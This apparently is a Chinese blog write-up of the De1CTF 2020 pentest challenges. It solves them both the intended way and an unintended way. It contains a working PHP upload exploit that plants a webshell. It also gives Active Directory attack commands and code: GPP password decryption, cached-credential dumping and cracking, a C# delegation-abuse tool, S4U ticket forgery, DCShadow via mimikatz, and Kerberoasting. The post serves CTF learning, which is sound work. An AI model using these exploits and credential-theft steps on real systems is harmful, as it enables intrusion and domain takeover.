De1tactf2020 pentest非预期解与预期解

pentest1

先是一个有绕过的文件上传,这部分是其他小伙伴做的直接给exp了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
import requests
import re
import sys

url='http://47.113.219.76/index.php'
headers={
'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryhJUhA4FiLizuakBx'
}
data="""------WebKitFormBoundaryhJUhA4FiLizuakBx
Content-Disposition: form-data; name="file"; filename="{}"
Content-Type: image/jpeg

{}
------WebKitFormBoundaryhJUhA4FiLizuakBx
Content-Disposition: form-data; name="submit"

submit
------WebKitFormBoundaryhJUhA4FiLizuakBx--"""

payload="""
<?=$_=[]?><?=$_=@"$_"?><?=$_=$_['!'=='@']?>
<?=$_?>
<?=$__=$_?>
<?=$___=$_?>
<?=$____=$_?>
<?=$_____=$_?>
<?=$______=$_?>
<?=$_______=$_?>
<?=$________=$_?>

<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>
<?=++$__?>

<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>
<?=++$___?>

<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>
<?=++$____?>

<?=++$_____?>
<?=++$_____?>
<?=++$_____?>
<?=++$_____?>

<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>
<?=++$______?>

<?=++$_______?>
<?=++$_______?>
<?=++$_______?>
<?=++$_______?>
<?=++$_______?>
<?=++$_______?>

<?=$________='_'?>


<?=$_________=$__.$___.$__.$____.$_____.$______?>
<?=$__________=$________.$_______.$_____.$____?>

<?=$____________________=$$__________?>


<?=$____________________[_]($____________________[__],$____________________[___])?>

"""

data=data.format("syc.pHp",payload)

r=requests.post(url=url,headers=headers,data=data)

filename=re.search("in:(uploads/.*)",r.text).group(1)
filename=filename.strip()

print("http://47.113.219.76/"+filename)
r=requests.get("http://47.113.219.76/"+filename+"?_=file_put_contents&__=1.php&___=<?php eval($_POST[a]);?>")

print(r.status_code)
print(r.text)

打完访问对应目录是下的1.php,密码是a。

连上webshell后把shell反弹到cs上,使用powerview进行信息收集可以看到,域内共享有一个hint。

1
2
powershell-import /Users/cengsiqi/Desktop/pentest/wintool/PowerView-dev.ps1
powershell get-domaincomputer|get-netshare

image.png
查看这个Hint可以发现,有一个拿flag的tip。

1
shell dir \\dc.De1CTF2020.lab\Hin

image.png
把提示拷贝下来下载发现这个zip需要密码才能打开。

1
shell copy \\dc.De1CTF2020.lab\Hint\flag1_and_flag2hint.zip .

image.png
image.png

接着收集,域内用户信息发现有一个可疑用户。

1
shell net user /dom

image.png
猜测HintZip_Pass账户密码就是解压缩的密码。这里经过一些尝试之后考虑会不会是gpp尝试ps直接导出,发现爆了个错,看意思是说当前用户不是domain user(客观事实是当前账户就是域用户)。

1
2
powershell-import /Users/cengsiqi/Desktop/pentest/Get-GPPPassword.ps1
powershell Get-GPPPassword

image.png
也不会改powershell,就直接手动遍历SYSVOL了(还好不是很多,多的话建议弹到msf上用msf的脚本搞)
image.png

1
2
3
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}"><Properties action="U" newName="" fullName="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/></User>
</Groups>
1
gpp-decrypt uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08

image.png
用zL1PpP@sSwO3d解密刚才的压缩包flag1_and_flag2hint.zip即可得到,第一个flag和下一关的提示。
image.png

pentest2

1
2
3
4
5
6
7
8
9
flag1: De1CTF{GpP_11Is_SoOOO_Ea3333y}

Get flag2 Hint:
hint1: You need De1ta user to get flag2
hint2: De1ta user's password length is 1-8, and the password is composed of [0-9a-f].
hint3: Pay attention to the extended rights of De1ta user on the domain.
hint4: flag2 in Domain Controller (C:\Users\Administrator\Desktop\flag.txt)

PS: Please do not damage the environment after getting permission, thanks QAQ.

从提示可以看出来,出题的思路是,通过某种离线爆破的方法拿到De1ta密码,De1ta用户存在acl滥用问题以至于可以搞到域控拿下读到C:\Users\Administrator\Desktop\flag.txt。

关于如何离线爆破我这里是非预期,之前服务器web账号有特权可以juicypotato提权。
image.png
我一直没成功。
image.png
当时有其他师傅成功,给我弹了个system shell。
image.png
导出De1ta账户的mscach

1
2
3
4
reg save hklm\system system.hive
reg save hklm\security security.hive

python secretsdump.py -security /Users/cengsiqi/Desktop/hash/security.hive -system /Users/cengsiqi/Desktop/hash/SYSTEM.hive LOCAL

image.png
可以拿到

1
DE1CTF2020.LAB/De1ta:$DCC2$10240#De1ta#52c2cfff23d879a2ba830cf184c10b46

根据提示的密码复杂度,用hascat跑出来结果是3f23ea12。

密码有了下一步根据提示来Delta acl滥用问题。

1
2
powershell-import /Users/cengsiqi/Desktop/pentest/wintool/PowerView-master.ps1
powershell Get-ObjectAcl -Domain De1CTF2020.lab -ResolveGUIDs|?{$_.IdentityReference -eq "DE1CTF2020\De1ta"}

输出出来了很多东西重点关注两个地方,第一个地方是De1ta的ExtendedRight让他具备Dcshadow的攻击的能力。
image.png

image.png

通过查阅资料可以知道Dcshadow攻击时需要De1ta这种特权账号和一个SYSTEM账号。做到这里的时候juciypotato已经修了,之前抓的administrator hash也改了。(经验不丰富,如果之前抓了机器hash也能提权了)。

接下来就需要关注第二个地方了。De1ta用户对DM机器具有WriteProperty,环境又是12,所以可以用烂番茄提权。
image.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
using System;
using System.Text;
using System.Security.AccessControl;
using System.Security.Principal;
using System.Net;
namespace Addnew_MachineAccount
{
class Program
{
static void Main(string[] args)
{
String DomainController = "192.168.0.12";
String Domain = "De1CTF2020.lab";
String new_MachineAccount = "lisan4"; //添加的机器账户
String new_MachineAccount_password = "sycl0ver"; //机器账户密码
String victimcomputer = "DM"; //需要进行提权的机器
String victimcomputer_ldap_path = "LDAP://CN=DM,CN=Computers,DC=De1CTF2020,DC=lab";
String machine_account = new_MachineAccount;
String sam_account = machine_account + "$";

String distinguished_name = "";
String[] DC_array = null;
distinguished_name = "CN=" + machine_account + ",CN=Computers";
DC_array = Domain.Split('.');
foreach (String DC in DC_array)
{
distinguished_name += ",DC=" + DC;
}
Console.WriteLine("[+] Elevate permissions on " + victimcomputer);
Console.WriteLine("[+] Domain = " + Domain);
Console.WriteLine("[+] Domain Controller = " + DomainController);
//Console.WriteLine("[+] New SAMAccountName = " + sam_account);
//Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
//连接ldap
System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
//NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录

System.DirectoryServices.Protocols.LdapConnection connection = null;
//connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = true;
connection.Bind();
var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account +"."+ Domain),
new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/"+machine_account+"."+Domain,"RestrictedKrbHost/"+machine_account+"."+Domain,"HOST/"+machine_account,"RestrictedKrbHost/"+machine_account)
});
try
{
//添加机器账户
connection.SendRequest(request);
Console.WriteLine("[+] Machine account: " + machine_account + " Password: " + new_MachineAccount_password + " added");
}
catch (System.Exception ex)
{
Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)");
Console.WriteLine("[-] Exception: " + ex.Message);
return;
}
// 获取新计算机对象的SID
var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
SecurityIdentifier sid = null;
foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
{
try
{
sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
}
catch
{
Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
return;
}
}
//设置资源约束委派
System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry("De1CTF2020.lab","De1ta", "3f23ea12");

myldapConnection.Path = victimcomputer_ldap_path;

myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
//通过ldap找计算机
search.Filter = "(CN=" + victimcomputer + ")";
string[] requiredProperties = new string[] { "samaccountname" };
foreach (String property in requiredProperties)
search.PropertiesToLoad.Add(property);
System.DirectoryServices.SearchResult result = null;
try
{
result = search.FindOne();
}
catch (System.Exception ex)
{
Console.WriteLine(ex.Message + "Exiting...");
return;
}
if (result != null)
{
System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();
String sec_desc = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
System.Security.AccessControl.RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_desc);
byte[] riptor_buffer = new byte[sd.BinaryLength];
sd.GetBinaryForm(riptor_buffer, 0);
// 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中
entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Value = riptor_buffer;
try
{
entryToUpdate.CommitChanges();//提交更改
Console.WriteLine("[+] Exploit successfully!");
}
catch (System.Exception ex)
{
Console.WriteLine(ex.Message);
Console.WriteLine("[!] \nFailed...");
return;
}
}
}
}
}

因为环境很混乱几个队伍都在相互覆盖msds-allowedtoactonbehalfofotheridentity,所以先后添加了多个spn。。lisan3$ lisan4$
image.png
加上委派之后然后就是s4u提权了。这里踩了大坑,下面来说一下。我先用的kekeo。

1
2
tgt::ask /user:lisan3$ /domain:De1CTF2020.lab /ntlm:30a7b270355d67451970d37ff1c9b666
tgs::s4u /tgt:TGT_lisan3$@DE1CTF2020.LAB_krbtgt~De1CTF2020.lab@DE1CTF2020.LAB.kirbi /user:Administrator@De1CTF2020.lab /service:cifs/DM.De1CTF2020.lab

S4U2self成功S4U2Proxy失败(当时反复确认过委派加上了的
image.png
image.png

换个工具rubues
image.png
但是dir始终不成功(后来问了一个师傅答复是:访问自己本身默认都是用当前用户身份去认证,不走网络认证,必须得主动调用网络认证才行)。
image.png
走到这里天色已晚有点肝不动了,就没继续了。第二天比赛结束出题师傅给我说用impakect就可以s4u而且能成。

1
2
3
4
5
proxychains getST.py -hashes 30a7b270355d67451970d37ff1c9b666:30a7b270355d67451970d37ff1c9b666 -spn cifs/dm.De1CTF2020.lab De1CTF2020/lisan4$
export KRB5CCNAME=/root/impacket-master/examples/lisan4$.ccache
proxychains getST.py -hashes 30a7b270355d67451970d37ff1c9b666:30a7b270355d67451970d37ff1c9b666 -k -impersonate Administrator -spn cifs/dm.De1CTF2020.lab De1CTF2020/lisan4$
export KRB5CCNAME=/root/impacket-master/examples/Administrator.ccache
proxychains psexec.py -k -no-pass dm.De1CTF2020.lab

这里一定注意要用fqdn(dm.De1CTF2020.lab)来请求,不要用ip。
这里一定注意要用fqdn(dm.De1CTF2020.lab)来请求,不要用ip。
这里一定注意要用fqdn(dm.De1CTF2020.lab)来请求,不要用ip。
image.png
有system权限后就是Dcshadow的操作了

system权限下

1
shell mimikatz.exe "!+" "!processtoken" "lsadump::dcshadow /object:de1ta /attribute:primaryGroupID /value:512"

我一直以为这种非交互式的mimkatz运行完会被beacon自动关闭掉,实际测下来并不会。
image.png
De1ta权限下

1
shell mimikatz.exe "lsadump::dcshadow /push" "exit"

image.png
执行完后system那边会有反应
image.png

1
shell net group "domain admins" /domain

会发现加上了
image.png
照理可以直接dir了但是最后还是有一个莫名其妙的坑(忽视图中把路径写错了,不过不影响这里的意思就是没权限,路径不存在是另外一个报错)
image.png
用rubues重新来一次tgt就好了

1
2
shell Rubeus.exe asktgt /user:de1ta /rc4:B03094996601324646AC223BF30D0D07 /domain:de1ctf2020.lab /ptt
shell type \\dc\c$\users\Administrator\Desktop\flag.txt

image.png

来说说预期解拿到De1ta账号密码

image.png

1
shell setspn -s http/DM.De1CTF2020.lab De1CTF2020\De1ta

image.png

1
shell cscript GetUserSPNs.vbs

image.png

1
2
powershell-import /Users/cengsiqi/Desktop/pentest/Empire/data/module_source/credentials/Invoke-Kerberoast.ps1
powershell Invoke-Kerberoast
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
TicketByteHexStream  : 
Hash : $krb5tgs$http/DM.De1CTF2020.lab:0B5E0028717C31BF16F95DDF
CA441A51$A71E43FD37E2E10E3029FE2767B0266CCABE13F68B27A46
955A440DA3F3B4AF1D4C7A8C357B69655364C27DA73C80FBE9075A94
615EB720E7A3E1E8610A1C18962338E87479D0A17D902B904B4DE4B5
AD3BAE015D3709899570BD6D25392C9E98345535523CCBE65125B0E7
1F2482040F2347DD13B7062B8A9E6DAA5C79F2843A2F030BBA0DCA91
8FFEEE32D61BCAF4453315AAED98A427CF843C71EDB3EFBD2F47EF83
9229E51A6A10A9D180B6EAF698B9C5D446F61BCA21E59413EC380A3F
426F941EA42704B7262812E44FA1F04F05DAFF0E06B5690538D3BB8B
10263FE97E05D6FE9F9E5BF1EFFF6A0344FA8F8B20CC0AA39BF95538
4C3B543BF9B9A4E23C8F071D24E846F284A6FE62278E76ED47897FB2
3264CC57A7EDE8C613EAD87914C511F2554AAEA6F663E66B8BA0760C
296F82253303A5FF2DF5F8343AD2097F57B376BF83C302D806D620B9
8ED2D3C53DF65AE37A7D6356EFC1A9123CCF56549A5288C132E3F5D0
5A066CE50FFCB654BF79FD5F673175F9AD98C1140E8B50D0F574080A
48EADBFBB00668B96A79F95E429CC42B4BD3CA2C9A106CD6D39312D9
BD13B4452861E47DD71F36D3DAD4A570480D56BDEF1F278518219FA2
5D076758B994C5F4EC8CF49C85DA1CFFAC91DF63AB5D71EF5135CD36
D54FCB9C2A9EF61D67A3BC01EF668F255A66487F3493BE0F8352EAFF
A009D561BE459F1130C6A3AF81060FD82232B3E430A196C5580FBDBB
3EEAC6AA6FD2774063CB16C1CB161B20CD6ED3BF414349DECCCF8753
9CE1EEBC28DD27DCE32752640F22817286211841DE22191300D75970
D721021FA1211FA368A14EACEBABA5B42B1F3B087CE04782A695F046
1CCCDC1445DE56D31582825E2824E47499C91A396D867A4284C4DD40
AD1E1AF7A2073729FCB66A52C076A7F3515C93F54189CBDAAF408838
736CA682CFF82CBA4DBFF757CD297CC16FF0A8F6F7C9F206ACB5BB87
61C54AD1635572C16E6FC01B40E6F84F71153514EA21A87B28358A38
4B3ECA5206F35EE3732DADE97726E07E8FEBE3D7EE3A77A2A4EEE1BE
59F4EC5336E4F65D2A4F111C79A73D24F9BDFCCBEAEAC5768538EFAD
00A191BB7941DF4A441BB83D061D42CB59D03A61921117DB835AA1D0
DEB00AD6BC4A694CC39A465CF23447D7CDB1F19EBFCB92C555E75CE6
7999B76A4FE22D1D34AF706A1505DC027D8BDC8A0055095605255BB8
F437551248B77A559463C39934A6A95F183DD1FF5C4152949C0B6F69
6C4B6A649A4B207CE4202B8884F54C1BC9ECA86F966EF2B86F3A89D3
1E07C880C5E5DBCD35338FB485A46E74779D45BF38E2398A16377C15
43E32DACFF71713DBF7288640AA751FC5A51B8DF873BBEB1F946331C
CF59E6FC4209322D9BCAB8C51F5B408545BA9C4DA11755B4477DF968
90F72E86D900D78BE6006BD14E1380725D1D8
SamAccountName : De1ta
DistinguishedName : CN=De1ta,CN=Users,DC=De1CTF2020,DC=lab
ServicePrincipalName : http/DM.De1CTF2020.lab
1
hashcat -m 13100 -a 0 kerberos.txt cracks.txt

ps:用ps也可以GetSPNUser

1
2
powershell-import /Users/cengsiqi/Desktop/pentest/wintool/kerberoast/GetUserSPNs.ps1
powershell GetUserSPNs

image.png

You need to set install_url to use ShareThis. Please set it in _config.yml.
You forgot to set the business or currency_code for Paypal. Please set it in _config.yml.

Comments

You forgot to set the shortname for Disqus. Please set it in _config.yml.